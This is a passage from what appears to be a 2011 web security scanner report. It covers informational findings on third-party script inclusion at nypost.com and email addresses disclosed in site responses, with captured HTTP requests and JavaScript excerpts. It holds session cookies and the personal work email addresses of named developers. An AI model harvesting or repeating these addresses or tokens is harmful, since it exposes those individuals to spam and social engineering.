Content-Length: 69001

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=dZiLDGjsGr3O3zacn9QLBk"></script>
...[SNIP]...

9.8. http://www.nypost.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 27 Sep 2011 13:20:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 27 Sep 2011 13:20:52 GMT
Content-Length: 148841
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div class="ad quigo">
    <script src="http://content.pulse360.com/6873D2DC-BEA6-11E0-933F-6C94CA3AF435" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async="async" charset="utf-8"></script>
...[SNIP]...

9.9. http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; _chartbeat2=rdx0wt5nps41a8fh.1315773978848; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.3.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
ETag: 66562fb2-1d30-402e-8dc5-09c5f4a9f7d6
Vary: Accept-Encoding
Cache-Control: max-age=20
Date: Tue, 27 Sep 2011 13:23:29 GMT
Content-Length: 67519
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
</div>
   <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div style="float:left"><script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</a>
       <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=nypost"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div class="ad quigo">
    <script src="http://content.pulse360.com/A9023D12-B87E-11E0-AB4D-244491016B62" type="text/javascript"></script>
...[SNIP]...
</div>
   <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div style="float:left"><script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</a>
       <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=nypost"></script>
...[SNIP]...
<div id="fb-root">
           
           <script src="http://connect.facebook.net/en_US/all.js#appId=APP_ID&amp;xfbml=1"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<!-- / Buzz Feed BuzzBox code ends -->
<script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=agA3woRRur3RsAab7jrHcU&s=40"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async="async" charset="utf-8"></script>
...[SNIP]...

9.10. http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
ETag: a000d3d0-a229-4254-bb15-2bddd605cc7f
Vary: Accept-Encoding
Cache-Control: max-age=2
Date: Tue, 27 Sep 2011 13:22:51 GMT
Content-Length: 69364
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
</div>
   <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div style="float:left"><script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</a>
       <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=nypost"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div class="ad quigo">
    <script src="http://content.pulse360.com/A9023D12-B87E-11E0-AB4D-244491016B62" type="text/javascript"></script>
...[SNIP]...
</div>
   <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div style="float:left"><script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</a>
       <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=nypost"></script>
...[SNIP]...
<div id="fb-root">
           
           <script src="http://connect.facebook.net/en_US/all.js#appId=APP_ID&amp;xfbml=1"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<!-- / Buzz Feed BuzzBox code ends -->
<script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=agA3woRRur3RsAab7jrHcU&s=40"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async="async" charset="utf-8"></script>
...[SNIP]...

9.11. http://www.nypost.com/pagesix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /pagesix

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagesix HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.4.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=4; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 27 Sep 2011 13:24:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 27 Sep 2011 13:24:41 GMT
Content-Length: 56332
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
</a>
   <script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#appId=123740221037962&amp;xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async="async" charset="utf-8"></script>
...[SNIP]...

10. Email addresses disclosed  previous  next
There are 39 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


10.1. https://hackalert.armorize.com/_js/rich_calendar.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /_js/rich_calendar.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_js/rich_calendar.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:40:20 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Thu, 20 Jan 2011 02:38:17 GMT
ETag: "33a27c-9818-49a3e06a57840"
Accept-Ranges: bytes
Content-Length: 38936
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-js

/*==============================================================================

Rich Calendar 1.0
=================
Copyright (c) 2007 Vyacheslav Smolin


Author:
-------
Vyacheslav Smolin (http://www.richarea.com, http://html2xhtml.richarea.com,
re@richarea.com)

About the script:
-----------------
Rich Calendar is 100% JavaScript calendar script. No pop-up windows.
Skinnable and multilingual. Multiple calendar instances on one page.
Allows to embed ca
...[SNIP]...

10.2. http://wd.sharethis.com/button/buttons.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /button/buttons.js

Issue detail

The following email address was disclosed in the response:

Request

GET /button/buttons.js HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware?taxonomyId=17
Cookie: __stid=CqIZrE48YIeMTxMbAzqQAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 26 Sep 2011 20:38:17 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Expires: Tue, 27 Sep 2011 20:38:17 GMT
Cache-Control: max-age=86400
Content-Length: 60743

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
rn false}stLight.processSTQ();stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.debug("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b=stLight.getSource();stLight.log("pview",b,"");stWidget.options.sessionID=stLight.sessionID;stWidget.options.fpc=stLight.fpc;stLight.loadServicesLoggedIn(function(){stButtons.onRead
...[SNIP]...

10.3. http://www.checksitetraffic.com/traffic_spy/xss.cx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.checksitetraffic.com
Path:   /traffic_spy/xss.cx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /traffic_spy/xss.cx HTTP/1.1
Host: www.checksitetraffic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=b5274bbcfce30657a609a765c232daaa; __utma=11725670.424988600.1317071405.1317071405.1317071405.1; __utmb=11725670.1.10.1317071405; __utmc=11725670; __utmz=11725670.1317071405.1.1.utmcsr=blog.armorize.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:11:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 18474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
<br>Customer Service Email: transfer-issues@networksolutions.com<br>
...[SNIP]...
<br>Email Address: no.valid.email@netsol.com<br>
...[SNIP]...
<br>Email Address: no.valid.email@netsol.com<br>
...[SNIP]...
<br>Email Address: no.valid.email@netsol.com<br>
...[SNIP]...
<br>Email Address: no.valid.email@netsol.com<br>
...[SNIP]...

10.4. http://www.checksitetraffic.com/traffic_spy/ziddu.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.checksitetraffic.com
Path:   /traffic_spy/ziddu.com

Issue detail

The following email addresses were disclosed in the response:

Request

GET /traffic_spy/ziddu.com HTTP/1.1
Host: www.checksitetraffic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blog.armorize.com/

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:09:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 74953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
</b> info@ziddu.com</p>
...[SNIP]...
<br>    Email: avilash1@hotmail.com<br>
...[SNIP]...
<br>    Email: info@ziddu.com<br>
...[SNIP]...
<br>    Email: info@ziddu.com<br>
...[SNIP]...

10.5. https://www.nbc.ca/WebInfoWebFiles/wi/common/include/css-js/Utils.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nbc.ca
Path:   /WebInfoWebFiles/wi/common/include/css-js/Utils.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /WebInfoWebFiles/wi/common/include/css-js/Utils.js HTTP/1.1
Host: www.nbc.ca
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www.nbc.ca/WebInfoWeb/DispatchRequest
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: newCookieBNC=1000; _ongletMC=06; JSESSIONID=0000RORNCPD4BNwSVxzUNqUz0oL:-1; lang=en

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 27 Sep 2011 13:41:53 GMT
Content-length: 42324
Content-type: application/x-javascript
Last-modified: Mon, 07 Jan 2008 20:30:08 GMT
Etag: "a554-47828bd0"
Accept-ranges: bytes

/**
* Utils.js
*
* This file contains some useful Javascript functions.
*
* Authors: Houssam Fawaz - Luc Rivet
*/

//> whitespace characters
var whitespace = " \t\n\r";


/**
* Trim leading spaces
*
* @param Field value
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/
function trimLeadingSpaces(str) {
   while ('' + str.charAt(0) == ' ')
       str = str.substring(1,str.length);
   return str;
}

/**
* Trim trailing spaces
*
* @param Field value
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/
function trimTrailingSpaces(str) {
   while('' + str.charAt(str.length - 1) == ' ')
       str = str.substring(0,str.length-1);
   return str;
}

/**
* Trim leading and trailing spaces
*
* @param Field value
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/
function trimSpaces(str) {    
   return trimLeadingSpaces(trimTrailingSpaces(str));
}

/**
* Trim leading and trailing spaces
*
* @param Field value
* @delim Special Character to remove
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/
function cleanString(field, delim) {
   while ('' + field.charAt(0) == delim)
       field = field.substring(1,field.length);
   
   while('' + field.charAt(field.length-1) == delim)
       field = field.substring(0,field.length-1);        
   
   return field;
}

/**
* Check whether string is empty
*
* @param Field value
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/
function isEmpty(s) {
   return ((s == null) || (s.length == 0))
}

/**
* Returns true if string s is empty or whitespace characters only.
*
* @param Field value
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/
function isWhiteSpace (s) {
   
   var i;

   // Is s empty?
   if (isEmpty(s)) return true;

    // Check whitespaces
   for (i = 0; i < s.length; i++) {
       // Check that current character isn't wh
...[SNIP]...
   var c = s.charAt(i);
       if (whitespace.indexOf(c) == -1) return false;
   }

   return true;
}

/**
* Display a message in an alert box
*
* @param text value
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/
function showMessage(strMessage) {
alert(strMessage);
}

/**
* Check the validity of a postal code (A9A 9A9)
*
* @param Field Object
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/
function isValidPostalCode(pCodeObj) {
   
   var pCodeValue = pCodeObj.value.toLowerCase();    
   
   var digitSet = "1234567890";
   var charSet = "abcdefghijklmnopqrstuvwxyz";
   var mustBeDigit = t
...[SNIP]...
ance number.
*
* @param 's' is a string that represent the field (ex: document.formName.fieldName)
*
* Return true if the social insurance number is valid
*
* @author Stefanie Lamoureux - stefanie.lamoureux@sibn.bnc.ca
*/
function NAS_isValid(s)
{
field_Nas = s.value;

var txt = "";
for (i=0; i<field_Nas.length; i++)
{ if( !isNaN(field_Nas.charAt(i)) )
    txt += field_Nas.char
...[SNIP]...
@param 's' is a string that represent the field (ex: document.formName.fieldName.value)
*
* Return true if the phone IS NOT valid ( not 111-1111 or 1111111 )
*
* @author Stefanie Lamoureux - stefanie.lamoureux@sibn.bnc.ca
*/
function phoneNotValid(s) {
   var txt = "";
   var valid = true;
   
   //>
...[SNIP]...
//> the phone number is not valid
return true;
else
return false;
}


/**
* Check if an input value is numeric
*
* @param Field Value
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function isNumericValue(vValue) {
   var strNegative    = "-";
   var strDecimal    = ".";
   var strValid    = "0123456789.";
   
   vValue = trimSpaces(vValue);

   var iNegativePos    = vValue.indexOf
...[SNIP]...
< iMaxDecimal)
           return false;
   }

   return true;
}

/**
* Check if an input value is numeric
*
* @param Field Value
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function isNumericValueNoDecimalLimit(vValue) {
   var strNegative    = "-";
   var strDecimal    = ".";
   var strValid    = "0123456789.";

   vValue = trimSpaces(vValue);
       
   var iNegativePos    =
...[SNIP]...
< iMaxDecimal)
       //    return false;
   }

   return true;
}

/**
* Check if an input value is integer;
*
* @param Field Value
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function isIntegerValue(vValue) {
   var strNegative    = "-";
   var strValid    = "0123456789";
   
   vValue = trimSpaces(vValue);
   
   var iNegativePos    = vValue.indexOf(strNegative);
   var iLast
...[SNIP]...
rValid.indexOf(vValue.charAt(j))==-1)
           return false;
   }

   return true;
}

/**
* Retourne si la valeur du champ est plus grand que 0.
*
* @param Field Value
*
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function isGreatherThen0( vValue ) {    
   if ( vValue > 0 ) {
       return true;
   } else {
       return false;
   }
}


/**
* Checks if a date is in the valid format : aaaa/mm/jj
*
* @param Field Value
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/
function isDateValid(txtDate) {
   var strChar = "";
   var strSep = "/";
   var strValid = "0123456789/";
   var iSepCount = 0;
   var leap = 0;
   var iSepPos = txtDate.indexOf(strSep);
...[SNIP]...

       return false;
   else {
       if (vDay > 31) return false;
   }

   return true;
}

/**
* Checks if a date is later than tha day's date
*
* @param Field Value
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/
function isDateLaterDayDate(txtDate) {
   //>
...[SNIP]...
e)
           return false;
   } else
       return false;
   
   return true;
}

/**
* Formats a currency..
*
* @param vValue : Field Value
* @param lang : locale value
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/
function formatCurrency(vValue, lang) {
   if (lang == "fr")
    return vValue + " $";
   else
    return "$ " + vValue;    
}

/**
* Formater un nombre avec deux decimals.
*
* @param    paramAmount        Le nombre a formater.
*
* @return    - Retourne le format suivant xxxxxxx0.00
*            - Si monbre invalide, retourne "".
*
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function formatAmount( paramAmount ) {
   var stringMoney = paramAmount+"";

   if ( !isNaN( paramAmount ) && stringMoney != "" ) {

       money = paramAmount;
       money = "" + ( ( Math.round( money
...[SNIP]...
else {
       money = "";
   }

   return money;
}

/**
* Checks if an email is in the valid format : name@domain_name.extension
*
* @param vValue : Field Object
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/

/**
*function depreciee, cela est liee a un bogue lorsqu'on rentre une adresse d'email invalide de 60 caracteres
*/
/*function isEmailValid(txtEmail) {
   if (/^\w+([\.-]?\w+)*@\w+([\.-]
...[SNIP]...
resents an atom (basically a series of non-special characters.) */
           
           var atom=validChars + '+';
           
           /* The following string represents one word in the typical username.
           For example, in john.doe@somewhere.com, john and doe are words.
           Basically, a word is either an atom or quoted string. */
           
           var word="(" + atom + "|" + quotedUser + ")";
           
           // The following pattern describes the structure o
...[SNIP]...
miere instance. Comparativement a la methode .focus() qui ne traite
* pas de cette particularitee.
*
* @param    theField    L'objet (document.form.champ) du formulaire.
*
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function setFocus( theField ) {
   if ( theField.focus ) {
       theField.focus();
   } else {
       if ( theField[0].focus() ) {
           theField[0].focus();
       }
   }
}

/**
* Retourner le type du champ du formulaire recu en parametre.
*
* @param    theField    L'objet (document.form.champ) du formulaire.
*
* @return    Le type du champ.
*
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function getFieldType( theField ) {
   if ( theField ) {
       if ( theField.type ){
           return theField.type;
       } else {
           if ( theField[0].type ) {
               return theField[0].type;
           }
       }
   }
...[SNIP]...
.champ2 ) ) { ...
*
* @return    boolean    - Vrai si un des champs recu en parametre est vide.
*                    - Faux si l'ensemble des champs recu en parametre ne sont pas vide.
*
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function isFieldEmpty( ) {
   var empty = 0;
   var theField;
   var theFieldType;

   for ( var i=0; i < isFieldEmpty.arguments.length; i++ ) {
       theField = isFieldEmpty.arguments[i];
       theField
...[SNIP]...
objets de type checkbox et select MULTIPLE ne sont pas traites.
*
* @param    theField    L'objet (document.form.champ) du formulaire.
*
* @return    La valeur du champ.
*
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function getFieldValue( theField ){

   theFieldType = getFieldType( theField );

   // SELEC-ONE
   if ( theFieldType == "select-one" ) {
       return getSelectValue( theField );
   }
   // RADIO
   i
...[SNIP]...
Radio    L'objet (document.form.radio) du formulaire.
*
* @return    - L'index du radio CHECKED : si un des radio est CHECKED.
*            - "" : si aucun des radio est CHECKED.
*
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function getRadioChecked( thisRadio ){
   for ( i=0; i< thisRadio.length; i++ ){
       if ( thisRadio[i].checked ){
           return i;
       }
   }
   return "";
}

/**
* Assigne les valeurs vides a list
...[SNIP]...
ont pas traites.
*
* @param    Liste d'objet (document.form.champ) recu du formulaire.
*            Ex; if ( setFieldEmpty( document.form.champ1, document.form.champ2 ) ) { ...
*
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function setFieldEmpty() {
   for ( var i = 0; i < setFieldEmpty.arguments.length; i++ ) {

       theField = setFieldEmpty.arguments[i];
       theFieldType = getFieldType(theField);

       // SELEC-ONE
...[SNIP]...
dans un select de type MULTIPLE.
*
* @param    theSelect    L'objet (document.form.select) du formulaire.
*
* @return    Nombre d'option SELECTED dans un select MULTIPLE.
*
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function getCountSelected( theSelect ) {
   var countSelected = 0;

   for ( var i = theSelect.options.length - 1; i >
...[SNIP]...
ct            L'objet (document.form.select) du formulaire.
* @param    theSelectedValue    Valeur prise par l'ensemble des proprietes
*                                SELECTED du select recu en parametre.
*
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function setAllSelectSelected( theSelect, theSelectedValue ) {
   for ( var j = theSelect.options.length - 1; j >
...[SNIP]...
e.
* @param    toSelect            L'objet (document.form.select) de sorti.
* @param    all                    Indique d'envoyer tout les options du select
*                                d'origine au select de sorti.
*
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function moveOptionFromSelectToSelect( fromSelect, toSelect, all ) {
   var i;

   for( i = fromSelect.options.length - 1; i >
...[SNIP]...
etre.
*
